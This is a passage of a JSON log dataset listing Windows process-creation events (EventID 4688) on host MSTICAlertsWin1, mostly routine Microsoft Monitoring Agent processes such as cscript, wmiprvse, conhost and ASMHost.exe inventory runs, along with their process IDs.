-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\